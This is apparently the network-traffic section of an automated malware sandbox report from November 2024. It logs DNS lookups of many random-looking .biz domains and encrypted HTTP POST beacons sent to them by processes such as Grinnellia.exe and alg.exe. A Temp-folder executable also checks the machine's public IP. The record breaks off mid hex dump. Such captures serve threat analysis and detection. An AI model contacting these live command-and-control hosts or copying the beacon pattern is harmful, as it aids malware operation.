                                                                                                                                                                                                    Nov 22, 2024 18:55:06.893671989 CET192.168.2.51.1.1.10xbb13Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.841943979 CET192.168.2.51.1.1.10x6e8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:09.412333012 CET192.168.2.51.1.1.10xe6d8Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.262392044 CET192.168.2.51.1.1.10x1333Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.476964951 CET192.168.2.51.1.1.10xf65dStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:14.769229889 CET192.168.2.51.1.1.10xdcf6Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:14.952399015 CET192.168.2.51.1.1.10xdbedStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.181989908 CET192.168.2.51.1.1.10x7898Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.485256910 CET192.168.2.51.1.1.10x56ecStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.153436899 CET192.168.2.51.1.1.10x7205Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.573723078 CET192.168.2.51.1.1.10xf9b3Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.838020086 CET192.168.2.51.1.1.10x5c16Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:19.842780113 CET192.168.2.51.1.1.10x5c16Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:56:05.025912046 CET192.168.2.51.1.1.10x169bStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:56:50.239949942 CET192.168.2.51.1.1.10xf90dStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.060266972 CET192.168.2.51.1.1.10x604eStandard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:56:55.907071114 CET192.168.2.51.1.1.10x848aStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:56:57.874224901 CET192.168.2.51.1.1.10x3c1fStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:57:00.865098953 CET192.168.2.51.1.1.10x5ca2Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:57:03.991084099 CET192.168.2.51.1.1.10x1106Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:57:06.345659971 CET192.168.2.51.1.1.10x3afcStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                    Nov 22, 2024 18:55:01.357222080 CET1.1.1.1192.168.2.50x4641No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:01.925343990 CET1.1.1.1192.168.2.50xc6bcNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.679636955 CET1.1.1.1192.168.2.50x2a39No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.484926939 CET1.1.1.1192.168.2.50x9c19No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.325177908 CET1.1.1.1192.168.2.50x10faNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.470069885 CET1.1.1.1192.168.2.50xbb13No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.988662004 CET1.1.1.1192.168.2.50x6e8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.988662004 CET1.1.1.1192.168.2.50x6e8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.988662004 CET1.1.1.1192.168.2.50x6e8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.988662004 CET1.1.1.1192.168.2.50x6e8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.988662004 CET1.1.1.1192.168.2.50x6e8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.988662004 CET1.1.1.1192.168.2.50x6e8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:09.981972933 CET1.1.1.1192.168.2.50xe6d8No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.730281115 CET1.1.1.1192.168.2.50x1333No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.730281115 CET1.1.1.1192.168.2.50x1333No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.099250078 CET1.1.1.1192.168.2.50xf65dNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.099250078 CET1.1.1.1192.168.2.50xf65dNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:14.907454967 CET1.1.1.1192.168.2.50xdcf6No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.177236080 CET1.1.1.1192.168.2.50xdbedName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.735441923 CET1.1.1.1192.168.2.50x7898No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.628526926 CET1.1.1.1192.168.2.50x56ecNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.554524899 CET1.1.1.1192.168.2.50x7205Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.808522940 CET1.1.1.1192.168.2.50xf9b3Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:19.830667019 CET1.1.1.1192.168.2.50x5c16No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:19.983797073 CET1.1.1.1192.168.2.50x5c16No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:56:05.967082024 CET1.1.1.1192.168.2.50x169bNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:56:50.882004976 CET1.1.1.1192.168.2.50xf90dNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.682539940 CET1.1.1.1192.168.2.50x604eNo error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.450983047 CET1.1.1.1192.168.2.50x848aNo error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.617075920 CET1.1.1.1192.168.2.50x3c1fNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.372210979 CET1.1.1.1192.168.2.50x5ca2No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.372210979 CET1.1.1.1192.168.2.50x5ca2No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.742625952 CET1.1.1.1192.168.2.50x1106No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:57:06.901895046 CET1.1.1.1192.168.2.50x3afcNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                                                                                    • pywolwnvd.biz
                                                                                                                                                                                                    • ssbzmoy.biz
                                                                                                                                                                                                    • cvgrf.biz
                                                                                                                                                                                                    • checkip.dyndns.org
                                                                                                                                                                                                    • npukfztj.biz
                                                                                                                                                                                                    • przvgke.biz
                                                                                                                                                                                                    • knjghuig.biz
                                                                                                                                                                                                    • lpuegx.biz
                                                                                                                                                                                                    • vjaxhpbji.biz
                                                                                                                                                                                                    • xlfhhhm.biz
                                                                                                                                                                                                    • ifsaia.biz
                                                                                                                                                                                                    • saytjshyf.biz
                                                                                                                                                                                                    • vcddkls.biz
                                                                                                                                                                                                    • fwiwk.biz
                                                                                                                                                                                                    • tbjrpv.biz
                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.54970554.244.188.177801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.157747030 CET347OUTPOST /tp HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: pywolwnvd.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.157766104 CET778OUTData Raw: 4a 78 df 02 02 7c 8c 13 fe 02 00 00 ad 68 81 aa 7e f2 79 4e dc eb 1d 31 ef 00 76 b0 6b 23 dd 6e e6 41 d8 51 80 6d 7c 3b 62 31 9c eb e8 27 ef 31 ae ad 9e f1 c0 48 b3 74 c3 b4 bb 9c 1f f1 e9 91 f9 38 b1 4c 2d 32 72 cb f0 eb 4b 6a cb bc e1 45 ff de
                                                                                                                                                                                                    Data Ascii: Jx|h~yN1vk#nAQm|;b1'1Ht8L-2rKjEge"+66F(q!fYpR(OIX}38)n5c>YcbMHi>7cz_QR"FDm4k9tXo%Vz,V.[/Xc9b:g)P
                                                                                                                                                                                                    Nov 22, 2024 18:55:03.499643087 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:03 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=17a749b54eee974c6b99213616949751|8.46.123.75|1732298103|1732298103|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    1192.168.2.54970654.244.188.177806468C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.851218939 CET353OUTPOST /fowvjqhq HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: pywolwnvd.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 832
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.851218939 CET832OUTData Raw: db f1 50 ff 7d 94 0e 13 34 03 00 00 29 a0 16 6b 29 54 d6 10 4b 2f d9 5a bd 2d 29 e8 16 7e bf df 2d 54 ab 74 31 03 b3 a8 4d 04 c6 90 d0 7d bb 32 bb 65 51 e9 d2 17 8e d4 f4 c7 d4 28 3a 30 b9 96 6e 75 0d 2e 3c b5 71 15 d4 32 d5 22 80 87 40 82 68 e2
                                                                                                                                                                                                    Data Ascii: P}4)k)TK/Z-)~-Tt1M}2eQ(:0nu.<q2"@hHgTca)9"!KkNbN$1_6TD5p}ls)D;wdggIFEs+tKBVqAX|{vm~>,7:uJ*|4+w&.|g84
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.300820112 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:04 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=7c062110df0b80ad863566e6b10c6979|8.46.123.75|1732298104|1732298104|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    2192.168.2.54970718.141.10.107801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.665410042 CET358OUTPOST /pmxflidirkcbpvm HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: ssbzmoy.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.665452003 CET778OUTData Raw: 75 b3 3f f8 24 46 df 4a fe 02 00 00 b4 28 9d 63 25 8e 51 54 62 3c 05 b3 51 7c 4c 41 b2 e9 fa 75 7d d1 06 cf 8c 64 7e 96 05 84 f8 07 e4 91 7e 67 8b 0c 0c b2 2f e9 45 cf b2 ce 20 1f ec 73 a0 b9 9e 24 84 94 a2 46 e2 c2 4a a2 22 67 8f 92 f3 c3 6c e0
                                                                                                                                                                                                    Data Ascii: u?$FJ(c%QTb<Q|LAu}d~~g/E s$FJ"glxV!=2TnHZq~\HSZYN|$s$`J=KlPJ)T@n{_PLPh+56@{ebA0\Z"(1f}%P[<]0iRZq
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.810857058 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:06 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=2723e4777baedc043ed341a786159322|8.46.123.75|1732298106|1732298106|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    3192.168.2.54970854.244.188.17780348C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.483361959 CET349OUTPOST /ygrk HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: pywolwnvd.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 832
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.483361959 CET832OUTData Raw: 57 18 da f6 2b e6 d6 12 34 03 00 00 90 b7 2f 8b 0c 12 0d f2 e2 0d ed 1a c6 17 50 80 b4 8a 98 4e 4c 43 4c 52 74 2c 84 da 6e 28 45 88 2a b2 54 26 3e 34 42 32 4e ce 73 80 bb 61 d5 68 dc fb bc 0b 5c ec 71 77 e0 b0 95 05 b5 9d c5 cb 28 1f 00 2b bd 50
                                                                                                                                                                                                    Data Ascii: W+4/PNLCLRt,n(E*T&>4B2Nsah\qw(+PD(JUGTVTcJ}?3oc"b_favYX:['{{UD@?A']i7gKJg$UJ$|bs#h:@b>WS6QVrnG8K
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.889367104 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:06 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=a3d4db1d49a682257e2de79e5c26a862|8.46.123.75|1732298106|1732298106|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    4192.168.2.54970954.244.188.177801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.874989986 CET352OUTPOST /ncgaeohbois HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: cvgrf.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.875005960 CET778OUTData Raw: 9c 24 19 41 a2 24 1c 67 fe 02 00 00 6d e8 1d 04 53 ba 8c cc e4 bd 8f e4 6b 4d 9f ae 0a 4b f7 f6 52 d7 13 28 4d 15 b4 48 d9 5b 15 a7 b5 08 d0 91 97 d2 cc 07 b7 13 3d 25 65 c1 42 e7 06 31 fd 0d 58 91 19 bb 34 4d 66 28 9f 63 f9 05 03 f7 76 97 48 62
                                                                                                                                                                                                    Data Ascii: $A$gmSkMKR(MH[=%eB1X4Mf(cvHb054_B`y}L*[*^CYrQ7Zqh)$ay*KjIh:oK /2l5NYfL&)VSw)2<gDG:B
                                                                                                                                                                                                    Nov 22, 2024 18:55:09.302017927 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:09 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=314e92fadd32ce50bc95948b2d51c55f|8.46.123.75|1732298109|1732298109|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    5192.168.2.549710132.226.8.169804324C:\Users\user\AppData\Local\Temp\server01.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:08.117968082 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.737875938 CET272INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:10 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 103
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.747299910 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.250415087 CET272INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:11 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 103
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    6192.168.2.54971144.221.84.105801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.300566912 CET356OUTPOST /xmmfsweyvhue HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: npukfztj.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.300607920 CET778OUTData Raw: 33 34 85 c2 ec 7e 84 6b fe 02 00 00 5f 1b d5 6b 41 94 45 37 69 17 d1 49 13 15 f6 89 6e c9 19 40 c6 94 41 86 9e c7 1f ce c3 6a 8f 2f e5 4c a5 b4 10 6a 40 af 36 c9 78 f5 5c 04 d0 38 1e 02 2d e7 09 02 45 d2 89 24 20 8c d4 b1 50 b9 36 1c 5e 8d d7 aa
                                                                                                                                                                                                    Data Ascii: 34~k_kAE7iIn@Aj/Lj@6x\8-E$ P6^3wc0sq9:"$i8\>NM!<0h35vw[46e.I/W5p`XKy/"_NH/\yZq_@Lv#\@|H./7Nh`bKE%[D
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.415122032 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:11 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=ce8e4df3a5d61c3616ad506b914dbf19|8.46.123.75|1732298111|1732298111|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    7192.168.2.549713172.234.222.143801716C:\Windows\System32\alg.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.244936943 CET357OUTPOST /hvtqtjugbboqpm HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.245002985 CET778OUTData Raw: fe 8c f1 45 ae 76 83 df fe 02 00 00 10 d1 49 44 cc 67 e8 50 84 3c 82 9b b4 c0 79 d2 45 30 5f 76 0d c1 05 b6 15 18 5c 6a bd 41 fc 02 3e 81 77 c2 71 8f e9 a4 63 a9 46 0a cb 74 cd 0a 5a fa 6e 5b 7d f1 a2 99 8e a4 e7 99 e6 22 68 a4 5e 8a 45 5e ca 76
